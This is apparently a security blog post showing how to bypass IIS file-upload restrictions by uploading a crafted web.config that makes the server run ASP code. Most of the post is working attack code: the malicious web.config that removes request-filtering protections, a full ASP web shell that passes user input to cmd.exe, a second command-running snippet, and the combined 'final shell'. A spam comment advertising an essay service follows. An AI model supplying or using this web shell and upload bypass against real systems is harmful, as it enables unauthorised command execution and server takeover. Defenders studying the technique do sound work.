Menu

Remote code execution using web.config file.

0 Comments

Many time we have a file upload function but we are not able to upload our .aspx file after using all client site bypass technique.

bypassing file upload vulnerability in IIS | romanshyadav|romanshyadav.com

A web.confg file is a kind of control file on that directory or you can customize the way your site behaves in that particular directory. if you create a web.config file in root directory then it will affect whole site.

This had some example code in it to actually execute code from the web.config. (Thanks Soroush!)

<?xml version=”1.0″ encoding=”UTF-8″?>
<configuration>
<system.webServer>
<handlers accessPolicy=”Read, Script, Write”>
<add name=”web_config” path=”*.config” verb=”*” modules=”IsapiModule” scriptProcessor=”%windir%\system32\inetsrv\asp.dll” resourceType=”Unspecified” requireAccess=”Write” preCondition=”bitness64″ />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=”.config” />
</fileExtensions>
<hiddenSegments>
<remove segment=”web.config” />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>

After this you can add you asp shell .

<%
Set oScript = Server.CreateObject(“WSCRIPT.SHELL”)
Set oScriptNet = Server.CreateObject(“WSCRIPT.NETWORK”)
Set oFileSys = Server.CreateObject(“Scripting.FileSystemObject”)

szCMD = request(“cmd”)

If (szCMD <> “”) Then
szTempFile = “c:\inetpub\wwwroot\uploadedfiles\” & oFileSys.GetTempName( )
Call oScript.Run (“cmd.exe /c ” & szCMD & ” > ” & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>

<HTML>
<BODY>
<FORM action=”” method=”GET”>
<input type=”text” name=”cmd” size=45 value=”<%= szCMD %>”>
<input type=”submit” value=”Run”>
</FORM>
<PRE>
<%= “\\” & oScriptNet.ComputerName & “\” & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

or you can also add this. you can add any one.

<% Response.write(“-“&”->”)
Response.write(“</p>
<pre>”)</p>
<p>Set wShell1 = CreateObject(“WScript.Shell”)
Set cmd1 = wShell1.Exec(“ipconfig”)
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing</p>
<p>Response.write(output1)
Response.write(“</pre>
<p><!-“&”-“) %>

so your final shell became like this.

<?xml version=”1.0″ encoding=”UTF-8″?>
<configuration>
<system.webServer>
<handlers accessPolicy=”Read, Script, Write”>
<add name=”web_config” path=”*.config” verb=”*” modules=”IsapiModule” scriptProcessor=”%windir%\system32\inetsrv\asp.dll” resourceType=”Unspecified” requireAccess=”Write” preCondition=”bitness64″ />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=”.config” />
</fileExtensions>
<hiddenSegments>
<remove segment=”web.config” />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>

<%
Set oScript = Server.CreateObject(“WSCRIPT.SHELL”)
Set oScriptNet = Server.CreateObject(“WSCRIPT.NETWORK”)
Set oFileSys = Server.CreateObject(“Scripting.FileSystemObject”)

szCMD = request(“cmd”)

If (szCMD <> “”) Then
szTempFile = “c:\inetpub\wwwroot\uploadedfiles\” & oFileSys.GetTempName( )
Call oScript.Run (“cmd.exe /c ” & szCMD & ” > ” & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>

<HTML>
<BODY>
<FORM action=”” method=”GET”>
<input type=”text” name=”cmd” size=45 value=”<%= szCMD %>”>
<input type=”submit” value=”Run”>
</FORM>
<PRE>
<%= “\\” & oScriptNet.ComputerName & “\” & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

The <handlers accessPolicy=”Read, Script, Write”>  will give the web.config file read, write permission and then we can add asp code inside the <%  %> and asp code will execute on the browser then we will get the Remote code execution.

code reference : https://poc-server.com/

Linux Reseller Hosting

1 thought on “Remote code execution using web.config file.”

  1. Kevincog says:

    In computer security , arbitrary code execution (ACE) is used to describe an attacker’s ability to execute arbitrary commands or code on a target machine or in a target process . An arbitrary code execution vulnerability is a security flaw in software or hardware allowing arbitrary code execution. A program that is designed to exploit such a vulnerability is called an arbitrary code execution exploit . The ability to trigger arbitrary code execution over a network (especially via a wide-area network such as the Internet) is often referred to as remote code execution (RCE).
    By the way! The best essay writing service – https://www.easyessay.pro/

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: